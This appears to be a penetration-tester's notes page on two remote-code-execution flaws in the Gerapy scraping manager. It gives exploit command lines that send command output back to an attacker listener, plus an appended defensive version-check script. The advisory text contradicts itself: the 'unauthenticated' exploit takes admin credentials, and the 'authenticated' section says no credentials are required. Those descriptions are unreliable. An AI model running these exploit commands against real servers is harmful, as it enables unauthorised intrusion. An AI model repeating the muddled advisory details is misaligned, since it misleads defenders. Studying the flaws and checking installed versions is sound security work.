Gerapy
Gerapy is a web-based management tool designed for deploying, scheduling, and controlling web scraping projects built with Scrapy. It provides a graphical interface that simplifies interaction with Scrapy spiders across multiple servers, removing the need to manually execute or configure them via the command line. Gerapy enables centralized management of multiple scraping jobs, integrates scheduling functionality, and supports deployment to distributed environments.
Unauthenticated RCE
Gerapy versions prior to 0.9.9 are vulnerable to unauthenticated RCE (CVE-2021-32849). This is due to improper input handling in the project deployment functionality. Specifically, the issue lies in how Gerapy processes uploaded project files. It fails to sanitize or validate the contents of these uploads, allowing an attacker to include malicious Python code within a project archive. When this archive is extracted and executed by the application, the embedded payload runs with the privileges of the Gerapy process. A PoC is available:
python3 CVE-2021-32849.py -u http://192.168.1.69:8000 -U admin -P admin@123 -r 10.10.16.34 -p 8888 -c id
The response, including the command's output, is received on the listener.
Authenticated RCE
Gerapy versions prior to 0.9.8 (CVE-2021-43857) are vulnerable to authenticated RCE due to the lack of authentication or access control on critical API endpoints. In vulnerable versions, attackers can directly interact with exposed endpoints that allow project deployment, spider execution, or command injection without requiring valid credentials. This flaw permits unauthenticated users to execute arbitrary system commands on the server hosting Gerapy, effectively resulting in RCE. A PoC is available, but we first need to create a project and then execute it.
$ searchsploit Gerapy
Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated) | python/remote/50640.py
$ python2 50640.py -t 192.168.161.24 -p 8000 -L 192.168.45.170 -P 80
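As an added defender-side example covering both advisories above (this is not Gerapy's own code and is not part of the original page), the script below triages a Gerapy installation against the fix thresholds the page states: versions below 0.9.9 for CVE-2021-32849 and below 0.9.8 for CVE-2021-43857. It reads the version from the installed distribution metadata (assuming the pip distribution is named `gerapy`) or accepts a version string on the command line, and it compares versions numerically so that, for example, 0.9.10 is correctly treated as newer than 0.9.9. The suffix handling for pre-releases is a deliberate simplification; in a real inventory tool use `packaging.version` instead.

```python
"""Triage an installed Gerapy against the advisories discussed on this page.

Added example, not Gerapy's own code. The fix thresholds below are the
ones stated on the page; the distribution name "gerapy" is an assumption.
"""
import re
import sys
from importlib import metadata

# CVE -> (first fixed version as stated on the page, short summary).
# Versions strictly below the fixed version are reported as affected.
ADVISORIES = {
    "CVE-2021-32849": ("0.9.9", "unauthenticated RCE via project deployment"),
    "CVE-2021-43857": ("0.9.8", "authenticated RCE via exposed API endpoints"),
}

_VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)(.*)$")


def parse_version(text):
    """Turn '0.9.7' or '0.9.9rc1' into a tuple that compares correctly.

    Numeric components compare as integers (so 0.9.10 > 0.9.9) and trailing
    zeros are dropped (so 0.9 == 0.9.0). Any suffix such as 'rc1' or 'b2'
    is treated as a pre-release that sorts below the plain release with the
    same numbers. Post-releases ('.post1') are not modelled; see lead-in.
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    numbers = [int(part) for part in m.group(1).split(".")]
    while len(numbers) > 1 and numbers[-1] == 0:
        numbers.pop()
    suffix = m.group(2).strip(" .-_").lower()
    release_flag = 0 if suffix else 1  # pre-release < final release
    return (tuple(numbers), release_flag, suffix)


def affected_advisories(version_text):
    """Return the sorted CVE ids whose fix threshold is above version_text."""
    installed = parse_version(version_text)
    return sorted(
        cve
        for cve, (fixed, _summary) in ADVISORIES.items()
        if installed < parse_version(fixed)
    )


def installed_gerapy_version():
    """Read the Gerapy version from package metadata, or None if not installed."""
    try:
        return metadata.version("gerapy")  # assumed distribution name
    except metadata.PackageNotFoundError:
        return None


def report(version_text):
    """Build a human-readable triage report for one version string."""
    lines = [f"Gerapy {version_text}:"]
    hits = affected_advisories(version_text)
    if not hits:
        lines.append("  not affected by the advisories listed on this page")
    for cve in hits:
        fixed, summary = ADVISORIES[cve]
        lines.append(f"  {cve}: {summary} (fixed in {fixed})")
    return "\n".join(lines)


if __name__ == "__main__":
    # Usage: python3 gerapy_triage.py            (checks the local install)
    #        python3 gerapy_triage.py 0.9.7      (checks a given version)
    version = sys.argv[1] if len(sys.argv) > 1 else installed_gerapy_version()
    if version is None:
        sys.exit("gerapy is not installed here; pass a version string as the first argument")
    print(report(version))
```

Run it on the host that serves Gerapy, or feed it the version reported by your asset inventory; an installation that comes back with either CVE listed should be upgraded to 0.9.9 or later and, meanwhile, kept off any network segment where unauthenticated clients can reach it.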